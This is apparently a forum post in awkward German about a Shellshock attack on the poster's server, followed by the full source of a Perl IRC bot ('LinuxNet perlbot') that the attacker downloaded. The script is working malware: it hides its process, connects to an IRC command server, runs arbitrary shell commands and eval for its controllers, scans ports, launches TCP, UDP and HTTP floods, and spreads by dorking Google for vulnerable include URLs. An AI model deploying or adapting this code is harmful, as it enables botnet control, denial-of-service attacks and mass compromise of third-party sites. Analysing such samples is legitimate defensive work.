Das ist jemand, der den Shellshock-Bug ausnutzt. Können Sie feststellen, was das Perl-Skript tat? Das ist definitiv einen Blick wert. Die zweite verwendete URL gibt 404 zurück, ist jedoch http://213.5.67.223/ji
vorhanden und möglicherweise identisch, da es sich um ein Perl-Skript handelt. Es scheint sich um einen IRC-Server zu handeln, daher kann es interessant sein, mit einem IRC-Client eine Verbindung zu Ihrem Testserver herzustellen. EDIT: Kommentar korrigiert mich, es ist ein Client, der in der Lage ist, dich zu beschnüffeln.
Überprüfen Sie auch, ob das Perl-Skript noch ausgeführt wird.
#!/usr/bin/perl
# ------------------------------------------------------------- #
# LinuxNet perlbot #
# ------------------------------------------------------------- #
#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`");
my $processo = '-';
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='7';
my $sleep='7';
my @adms=("x","JB" );
my @hostauth=("localhost","outlaw");
my @canais=("#gnu");
my $nick='|GNU|';
my $ircname ='GNU';
chop (my $realname = `uname -sr`);
$servidor='ircd.w3h.co.uk' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/$goni$boturl" ;
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(5)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"allinurl:%22".$dom."/".$goni."%22");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}